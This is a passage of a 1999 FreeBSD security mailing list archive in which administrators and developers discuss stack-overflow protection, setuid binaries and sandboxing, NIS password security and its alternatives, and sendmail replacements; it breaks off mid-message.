(Postfix) with ESMTP id 444F8155B7 for ; Wed, 3 Nov 1999 06:07:57 -0800 (PST) (envelope-from danderse@faith.cs.utah.edu) Received: (from danderse@localhost) by faith.cs.utah.edu (8.9.3/8.9.3) id GAA22340; Wed, 3 Nov 1999 06:58:09 -0700 (MST) From: David G Andersen Message-Id: <199911031358.GAA22340@faith.cs.utah.edu> Subject: Re: stack protecting To: andre@sun4c.net (Andre Gironda) Date: Wed, 3 Nov 1999 06:58:09 -0700 (MST) Cc: frank@hellbell.agava.ru, freebsd-security@FreeBSD.ORG In-Reply-To: <19991103012048.A18803@toaster.sun4c.net> from "Andre Gironda" at Nov 3, 99 01:20:48 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lo and behold, Andre Gironda once said: > > > Stack protection doesn't work as there are still heap overflows and > race conditions. it's best to apply TPE patches (Phrack, Issue 52/54), > like originally implemented on upt.org. Or write perfect code ;> While I agree with you that it's not a perfect solution, isn't that like saying that using a car alarm isn't a good idea, even though it will prevent 50% of the breakins to your car? Defense in depth *is* a good idea. Stackguard and like products can help quite a bit with this. Now, given that, Stackguard doesn't support FreeBSD. :) -Dave -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 6: 9:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id 5C5DF1550B for ; Wed, 3 Nov 1999 06:09:31 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id B5C281A61; Wed, 3 Nov 1999 04:10:27 -0500 (EST) From: Spidey MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14367.64514.294218.824898@anarcat.dyndns.org> Date: Wed, 3 Nov 1999 09:10:26 +0000 (GMT) To: Ollivier Robert Cc: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use References: <14364.64172.638014.558487@anarcat.dyndns.org> <99Nov1.143118est.40332@border.alcanet.com.au> <14365.48408.87230.710344@anarcat.dyndns.org> <19991101203858.A39857@keltia.freenix.fr> X-Mailer: VM 6.72 under 21.1 "20 Minutes to Nikko" XEmacs Lucid (patch 2) Reply-To: Spidey Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ok... In fact, this UUCP thing has been discussed over and over again on the various FBSD-* lists, and I don't want to get back on this, as I think compatibility wins over the security in that perticular case. Anyways, since UUCP runs in its sandbox, I guess it's ok... Thanks for all your comments, everybody. I'll start checking the ports tree soon for setuids... :)) Wish me luck! AnarCat. --- Big Brother told Ollivier Robert to write, at 20:38 of November 1: > According to Spidey: > > Ok. But what is its use??? Is it used by X? Why is it suid? > > Xwrapper is setuid so that the X server itself doesn't have to be. > > > Ok. but what _is it_? Why does it needs special permissions? > > UUCP = Unix-to-Unix CoPy. It is an old but still used way of sending files and > execute command across serial lines (and TCP as well). It predates TCP/IP and > is used mostly now by European and people who pay by the minutes (or bytes) > their phone lines. > > It is the most efficient way of transfering news batches I know on serial > lines. We have a good network of UUCP connected machines here in France and I > manage a small USP (Usenet Service Provider :-)) along with friends. We have > around 40 people that would kill anyone wanting to remove UUCP support :-) > > We even have people with PPP or cable connections that are still using UUCP > (over TCP) in order to get their mail/news. You don't need hacks like POP > before SMTP or multiple mailbox support in POP/IMAP with UUCP. Routing entire > domains is natural and multiple account is native usage. > -- > Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr > FreeBSD keltia.freenix.fr 4.0-CURRENT #74: Thu Sep 9 00:20:51 CEST 1999 > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Si l'image donne l'illusion de savoir C'est que l'adage pretend que pour croire, L'important ne serait que de voir Lofofora To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 6:32:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id 893D915583 for ; Wed, 3 Nov 1999 06:32:42 -0800 (PST) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id IAA10785; Wed, 3 Nov 1999 08:30:57 -0600 (CST) (envelope-from jeff-ml@mountin.net) Received: from dial-150.tnt1.rac.cyberlynk.net(209.224.182.150) by peak.mountin.net via smap (V1.3) id sma010783; Wed Nov 3 08:30:42 1999 Message-Id: <3.0.3.32.19991103083132.01b5fa50@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Wed, 03 Nov 1999 08:31:32 -0600 To: Greg Lewis , freebsd-security@FreeBSD.ORG From: "Jeffrey J. Mountin" Subject: Re: Security and NIS - alternatives? In-Reply-To: <199911030811.SAA29824@ares.maths.adelaide.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:41 PM 11/3/99 +1030, Greg Lewis wrote: >Hi all, > >I am about to undertake setting up a number of FreeBSD workstations and >have been reading up on NIS in the FreeBSD man pages. Statements like the >following in yp(4) concern me somewhat: > > While these enhancements provide better security than stock NIS, they are > by no means 100% effective. It is still possible for someone with access > to your network to spoof the server into disclosing the shadow password > maps. > >I have noted the steps which can be taken to provide better security than >standard, but the fact that holes remain is a concern. I also note that >NIS+ doesn't appear to be currently supported. > >This is not meant to be a complaint, I simply wish to ask if there is a >more secure alternative? I'd like one where passwords were not sent over >the network except via something like SSL or an ssh tunnel. Or run a separate network for passing NIS information and block NIS queries on the "primary" network visible to the world. Could do the same for other services as well. And there is the ever popular do-not-allow-shell-accounts method, but your mention of workstations limits either of these solutions. Have you considered SKIP? Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve '86 Yamaha MaxiumX (not FBSD powered) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 7:29:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 1DF4715635 for ; Wed, 3 Nov 1999 07:29:40 -0800 (PST) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA26958; Wed, 3 Nov 1999 07:29:39 -0800 Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda26950; Wed Nov 3 07:28:26 1999 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id HAA25358; Wed, 3 Nov 1999 07:21:29 -0800 (PST) Message-Id: <199911031521.HAA25358@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdM25354; Wed Nov 3 07:21:21 1999 X-Mailer: exmh version 2.1.0 09/18/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 3.3-RELEASE X-Sender: cy To: cjclark@home.com Cc: beaupran@iro.umontreal.ca (Spidey), peter.jeremy@alcatel.com.au, freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use In-reply-to: Your message of "Mon, 01 Nov 1999 23:49:57 EST." <199911020449.XAA03496@cc942873-a.ewndsr1.nj.home.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 03 Nov 1999 07:21:20 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199911020449.XAA03496@cc942873-a.ewndsr1.nj.home.com>, "Crist J. Cl ark" writes: > Spidey wrote, > > > ># Allow users to bind on a socket (which? where?) > > > > ping mode=4555 > > > Needed to allow ordinary mortals to sent raw IP (ICMP) packets. > > > > I don't think this should be enable by default... on a shell box, this > > could cause some pretty dense headaches... > > You don't think mortal users should be able to ping? IMHO, ping is a > _very_ basic utility that generally should be turned on. I don't want > to have to 'su' to root everytime I want to ping a host to see if it > is awake. Same goes for traceroute(8). I've seen and tried ping exploits for Sun and DEC platforms that are supposed to relinquish root to an attacker, though my tests have crashed the boxes rather than relinquish root. Something my team has been discussing, without consensus of course, is providing sudo access to ping to users we trust. > > If you want to turn off the setuid (in which case you might as well > chmod to 700 as well), you can, but I really don't see it as the > default setup. Agreed. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Sun/DEC Team, UNIX Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=0" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 8:29:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.aye.net (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (Postfix) with SMTP id 3268C1506B for ; Wed, 3 Nov 1999 08:29:48 -0800 (PST) (envelope-from barrett@phoenix.aye.net) Received: (qmail 27775 invoked by uid 1000); 3 Nov 1999 16:30:04 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 3 Nov 1999 16:30:04 -0000 Date: Wed, 3 Nov 1999 11:30:04 -0500 (EST) From: Barrett Richardson To: David G Andersen Cc: Andre Gironda , frank@hellbell.agava.ru, freebsd-security@FreeBSD.ORG Subject: Re: stack protecting In-Reply-To: <199911031358.GAA22340@faith.cs.utah.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 3 Nov 1999, David G Andersen wrote: > Lo and behold, Andre Gironda once said: > > > > > > Stack protection doesn't work as there are still heap overflows and > > race conditions. it's best to apply TPE patches (Phrack, Issue 52/54), > > like originally implemented on upt.org. Or write perfect code ;> > > While I agree with you that it's not a perfect solution, isn't that > like saying that using a car alarm isn't a good idea, even though it will > prevent 50% of the breakins to your car? > > Defense in depth *is* a good idea. Stackguard and like products can > help quite a bit with this. > > Now, given that, Stackguard doesn't support FreeBSD. :) > > -Dave > Takes some minor twiddleing. What it upt.org? It doesn't resolve. - Barrett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 8:38:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xnet.com (quake.xnet.com [198.147.221.33]) by hub.freebsd.org (Postfix) with ESMTP id 2DA9915147 for ; Wed, 3 Nov 1999 08:38:36 -0800 (PST) (envelope-from drwho@xnet.com) Received: from typhoon.xnet.com (typhoon.xnet.com [198.147.221.66]) by mail.xnet.com (8.9.3+Sun/XNet-3.0R) with ESMTP id KAA25723 for ; Wed, 3 Nov 1999 10:38:35 -0600 (CST) Received: by typhoon.xnet.com (Postfix, from userid 5500) id 3EDD73AFE1; Wed, 3 Nov 1999 10:38:35 -0600 (CST) Date: Wed, 3 Nov 1999 10:38:35 -0600 From: Michael Maxwell To: freebsd-security@freebsd.org Subject: Re: Security and NIS - alternatives? Message-ID: <19991103103835.A10478@typhoon.xnet.com> References: <199911030811.SAA29824@ares.maths.adelaide.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199911030811.SAA29824@ares.maths.adelaide.edu.au>; from Greg Lewis on Wed, Nov 03, 1999 at 06:41:13PM +1030 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 03, 1999 at 06:41:13PM +1030, Greg Lewis wrote: > Hi all, > > I am about to undertake setting up a number of FreeBSD workstations and > have been reading up on NIS in the FreeBSD man pages. Statements like the > following in yp(4) concern me somewhat: > > While these enhancements provide better security than stock NIS, they are > by no means 100% effective. It is still possible for someone with access > to your network to spoof the server into disclosing the shadow password > maps. > > I have noted the steps which can be taken to provide better security than > standard, but the fact that holes remain is a concern. I also note that > NIS+ doesn't appear to be currently supported. > > This is not meant to be a complaint, I simply wish to ask if there is a > more secure alternative? I'd like one where passwords were not sent over > the network except via something like SSL or an ssh tunnel. Well, to top that all off, it would be nice to have something more secure that is able to play nicely with Sun machines. There is simply no way to implement the extra security measure provided in the FreeBSD NIS when using anything other than FreeBSD (that I'm aware of). -- Fight email spam: http://www.cauce.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 9: 9:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from toaster.sun4c.net (toaster.sun4c.net [63.193.27.6]) by hub.freebsd.org (Postfix) with ESMTP id A4F871536D for ; Wed, 3 Nov 1999 09:09:23 -0800 (PST) (envelope-from andre@toaster.sun4c.net) Received: (from andre@localhost) by toaster.sun4c.net (8.9.3/8.9.3) id JAA19080; Wed, 3 Nov 1999 09:00:04 -0800 (PST) Date: Wed, 3 Nov 1999 09:00:03 -0800 From: Andre Gironda To: David G Andersen Cc: Andre Gironda , frank@hellbell.agava.ru, freebsd-security@FreeBSD.ORG Subject: Re: stack protecting Message-ID: <19991103090003.B18803@toaster.sun4c.net> References: <19991103012048.A18803@toaster.sun4c.net> <199911031358.GAA22340@faith.cs.utah.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: <199911031358.GAA22340@faith.cs.utah.edu>; from David G Andersen on Wed, Nov 03, 1999 at 06:58:09AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 03, 1999 at 06:58:09AM -0700, David G Andersen wrote: > Lo and behold, Andre Gironda once said: > > > > Stack protection doesn't work as there are still heap overflows and > > race conditions. it's best to apply TPE patches (Phrack, Issue 52/54), > > like originally implemented on upt.org. Or write perfect code ;> > > While I agree with you that it's not a perfect solution, isn't that > like saying that using a car alarm isn't a good idea, even though it will > prevent 50% of the breakins to your car? > > Defense in depth *is* a good idea. Stackguard and like products can > help quite a bit with this. I wouldn't go around toting car alarms or Stackguard for full protection, that's all. ;> And I really doubt in either case you prevent 50% of breakins. There is a LOT of material available that explains the inner- workings of heap overflows. There is a lot of generated code that aids a person with exploiting heap overflows. They are readily available just like stack overflow exploit scripts are readliy available. If you can find a way to stack protect FreeBSD, go for it, I say. But it's not going to solve every problem. dre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 9:48:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 502E615700 for ; Wed, 3 Nov 1999 09:48:26 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id MAA36300; Wed, 3 Nov 1999 12:29:38 -0500 (EST) (envelope-from robert@cyrus.watson.org) Date: Wed, 3 Nov 1999 12:29:38 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Spidey Cc: Ollivier Robert , freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use In-Reply-To: <14367.64514.294218.824898@anarcat.dyndns.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 3 Nov 1999, Spidey wrote: > Ok... In fact, this UUCP thing has been discussed over and over again > on the various FBSD-* lists, and I don't want to get back on this, as > I think compatibility wins over the security in that perticular case. > > Anyways, since UUCP runs in its sandbox, I guess it's ok... Hmm. Well, the old security hole in the sandbox that I reported, that root ran uustat each day, has now been fixed (at least, in 3.3 it has been). However, I don't like that /usr/bin/uustat is still owned by UUCP, and appears in the default path for root and others. Really, if a binary is not owned by a privileged account, it should not be in the default system path, rather in some obscure subdirectory where a user has to intentionally go find it, in my opinion. :-) Same goes for man -- /usr/bin/man is owned by uid man, so anyone who breaks the manpage sandbox can modify it, and abscond with the privileges of any user running man. Man should really use a gid, not a uid, so that the man binary doesn't have to by writable by the sandbox. Or alternatively, we should throw away caching since our machines are getting so fast :-). There are no doubt others, of course, but the traditional flaw here is that setuid binaries have to be owned by the account they switch to, making them a poor choice for a sandbox. Really the binary switching to the sandbox should not be modifiable by code running in the sandbox. setgid doesn't fix that entirely because it doesn't handle the sandbox the same way, but... Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 9:48:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id F3FF815747; Wed, 3 Nov 1999 09:48:26 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id VAA32477; Tue, 2 Nov 1999 21:45:49 -0500 (EST) (envelope-from robert@cyrus.watson.org) Date: Tue, 2 Nov 1999 21:45:48 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Josef Karthauser Cc: "Jordan K. Hubbard" , Poul-Henning Kamp , Kris Kennaway , security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: OpenSSH patches In-Reply-To: <19991102232912.C79916@florence.pavilion.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 2 Nov 1999, Josef Karthauser wrote: > On Tue, Nov 02, 1999 at 10:58:37AM -0800, Jordan K. Hubbard wrote: > > > > > BTW, "they" tell me that when the new crypto guidelines are released, the > > > chances are they will also be friendly to open source. Hopefully "they" > > > are right. (they being people appropriately placed in the process) > > > > I've been told the same thing but am investigating an export license > > in any case. For a lot of good reasons, this is something we really > > need, even if we have to take a few chances and/or move a CVS server > > to Canada. :) > > Or England ;) Yes, but they took away my passport that said "Great Britain" -- now it says "EU". Go figure. My understanding is that the UK has it's own fill of crypto-controversy, it just happens to be more open source-friendly, at least from my conversations with Ross Anderson at Cambridge this summer... Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 9:59: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from broccoli.graphics.cornell.edu (broccoli.graphics.cornell.edu [128.84.247.53]) by hub.freebsd.org (Postfix) with ESMTP id 6190A1553C for ; Wed, 3 Nov 1999 09:58:52 -0800 (PST) (envelope-from mkc@Graphics.Cornell.EDU) Received: from graphics.cornell.edu by broccoli.graphics.cornell.edu with ESMTP (1.37.109.16/16.2) id AA215051921; Wed, 3 Nov 1999 12:58:41 -0500 Message-Id: <199911031758.AA215051921@broccoli.graphics.cornell.edu> X-Mailer: exmh version 2.0zeta 7/24/97 To: Greg Lewis Cc: freebsd-security@FreeBSD.ORG Subject: Re: Security and NIS - alternatives? In-Reply-To: Your message of "Wed, 03 Nov 1999 18:41:13 +1030." <199911030811.SAA29824@ares.maths.adelaide.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 03 Nov 1999 12:58:40 -0500 From: Mitch Collinsworth Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >This is not meant to be a complaint, I simply wish to ask if there is a >more secure alternative? I'd like one where passwords were not sent over >the network except via something like SSL or an ssh tunnel. NIS doesn't send plain text passwords over the net. It only sends the encrypted form over the net. The plain text is encrypted on the client and compared against the encrypted form. If you want something better than that, have a look at kerberos. -Mitch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 10: 3:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 776D5156A2 for ; Wed, 3 Nov 1999 10:03:35 -0800 (PST) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Wed, 3 Nov 1999 11:03:34 -0700 (MST) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma014059; Wed, 3 Nov 99 11:03:17 -0700 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id LAA31333; Wed, 3 Nov 1999 11:01:07 -0700 (MST) Date: Wed, 3 Nov 1999 11:01:07 -0700 (MST) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Andre Gironda Cc: freebsd-security@FreeBSD.ORG Subject: Re: stack protecting In-Reply-To: <19991103090003.B18803@toaster.sun4c.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 3 Nov 1999, Andre Gironda wrote: > And I really doubt in either case you prevent 50% of breakins. Why? By a significant margin, most exploitable buffer overflows have proven to be of the stack-based variety, and if you've got StackGuard up and running I think you'll prevent much more than just 50% of breakins from buffer overflows. > There is a LOT of material available that explains the inner-workings > of heap overflows. There is a lot of generated code that aids a > person with exploiting heap overflows. They are readily available just > like stack overflow exploit scripts are readliy available. I agree that heap-based overflows can be exploitable, but they are typically more difficult to exploit and seem to be usually less prevalent than stack-based overflows. On other OSes such as Solaris, attacking important memory areas such as the procedure linkage table (used for dynamic linking) by hitting the stdio FILE structures through an overflow in the data/BSS segment has been fruitful in the past, but I don't know that we've seen the same for FreeBSD. What was the last heap-based overflow exploit for FreeBSD? The l0pht crontab hole or maybe the suidperl 4.x hole? > If you can find a way to stack protect FreeBSD, go for it, I say. But it's > not going to solve every problem. I agree, but if it adds at least some protection against the biggest cause of holes, why not use it? I don't think people should use it to give themselves a false sense of security though. BTW, it *is* possible to use StackGuard on FreeBSD, but it does take some hackage to get it to work. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 11:59:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from florence.pavilion.net (florence.pavilion.net [194.242.128.25]) by hub.freebsd.org (Postfix) with ESMTP id A9A6514F85 for ; Wed, 3 Nov 1999 11:59:50 -0800 (PST) (envelope-from joe@florence.pavilion.net) Received: (from joe@localhost) by florence.pavilion.net (8.9.3/8.8.8) id TAA15635; Wed, 3 Nov 1999 19:59:39 GMT (envelope-from joe) Date: Wed, 3 Nov 1999 19:59:39 +0000 From: Josef Karthauser To: Adam Laurie Cc: matt@sevenone.com, freebsd-security@FreeBSD.ORG Subject: Re: Sendmail options, what's more secure? Message-ID: <19991103195939.B14819@florence.pavilion.net> References: <3820051F.B2BAAF89@sevenone.com> <38201FD5.89EAAD09@algroup.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i In-Reply-To: <38201FD5.89EAAD09@algroup.co.uk> X-NCC-RegID: uk.pavilion Organisation: Pavilion Internet plc, 24 The Old Steine, Brighton, BN1 1EL, England Phone: +44-845-333-5000 Fax: +44-845-333-5001 Mobile: +44-403-596893 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 03, 1999 at 11:43:17AM +0000, Adam Laurie wrote: > matt baker wrote: > > A popular alternative is qmail... > > http://www.qmail.org/ > And postfix :) http://www.postfix.org/ Joe -- Josef Karthauser FreeBSD: How many times have you booted today? Technical Manager Viagra for your server (http://www.uk.freebsd.org) Pavilion Internet plc. [joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 12: 3:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from ares.maths.adelaide.edu.au (ares.maths.adelaide.edu.au [129.127.246.5]) by hub.freebsd.org (Postfix) with ESMTP id 3AE6214F85 for ; Wed, 3 Nov 1999 12:03:31 -0800 (PST) (envelope-from glewis@ares.maths.adelaide.edu.au) Received: (from glewis@localhost) by ares.maths.adelaide.edu.au (8.9.3/8.9.3) id GAA31975 for freebsd-security@freebsd.org; Thu, 4 Nov 1999 06:32:12 +1030 (CST) (envelope-from glewis) From: Greg Lewis Message-Id: <199911032002.GAA31975@ares.maths.adelaide.edu.au> Subject: Re: Security and NIS - alternatives? In-Reply-To: <3.0.3.32.19991103083132.01b5fa50@207.227.119.2> from "Jeffrey J. Mountin" at "Nov 3, 1999 08:31:32 am" To: freebsd-security@freebsd.org Date: Thu, 4 Nov 1999 06:32:12 +1030 (CST) X-Mailer: ELM [version 2.4ME+ PL56 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Or run a separate network for passing NIS information and block NIS queries > on the "primary" network visible to the world. Could do the same for other > services as well. Unfortunately the network setup I have to work with won't allow that. I'd certainly do it if I could. > And there is the ever popular do-not-allow-shell-accounts method, but your > mention of workstations limits either of these solutions. Yep, all the staff will have shell accounts. > Have you considered SKIP? No, but I'll certainly go and have a look into it. Thanks! -- Greg Lewis glewis@trc.adelaide.edu.au Computing Officer +61 8 8303 5083 Teletraffic Research Centre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 12: 5:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from ares.maths.adelaide.edu.au (ares.maths.adelaide.edu.au [129.127.246.5]) by hub.freebsd.org (Postfix) with ESMTP id 743C515864 for ; Wed, 3 Nov 1999 12:05:50 -0800 (PST) (envelope-from glewis@ares.maths.adelaide.edu.au) Received: (from glewis@localhost) by ares.maths.adelaide.edu.au (8.9.3/8.9.3) id GAA32013 for freebsd-security@freebsd.org; Thu, 4 Nov 1999 06:35:21 +1030 (CST) (envelope-from glewis) From: Greg Lewis Message-Id: <199911032005.GAA32013@ares.maths.adelaide.edu.au> Subject: Re: Security and NIS - alternatives? In-Reply-To: <199911031758.AA215051921@broccoli.graphics.cornell.edu> from Mitch Collinsworth at "Nov 3, 1999 12:58:40 pm" To: freebsd-security@freebsd.org Date: Thu, 4 Nov 1999 06:35:21 +1030 (CST) X-Mailer: ELM [version 2.4ME+ PL56 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > NIS doesn't send plain text passwords over the net. It only sends the > encrypted form over the net. The plain text is encrypted on the client > and compared against the encrypted form. I am certainly aware of this, I'd just prefer that the encrypted password wasn't sent over the wire either, since that in itself is a point of attack that I've so far avoided by forcing people to use ssh. > If you want something better than that, have a look at kerberos. I will, thanks for your suggestion! -- Greg Lewis glewis@trc.adelaide.edu.au Computing Officer +61 8 8303 5083 Teletraffic Research Centre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 3 12:22:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 9C925150A4 for ; Wed, 3 Nov 1999 12:22:50 -0800 (PST) (envelope-from fullermd@futuresouth.com) Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id OAA05798; Wed, 3 Nov 1999 14:22:25 -0600 (CST) Date: Wed, 3 Nov 1999 14:22:25 -0600 From: "Matthew D. Fuller" To: Greg Lewis Cc: freebsd-security@FreeBSD.ORG Subject: Re: Security and NIS - alternatives? Message-ID: <19991103142225.C5503@futuresouth.com> References: <199911030811.SAA29824@ares.maths.adelaide.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre3i In-Reply-To: <199911030811.SAA29824@ares.maths.adelaide.edu.au> X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 03, 1999 at 06:41:13PM +1030, a little birdie told me that Greg 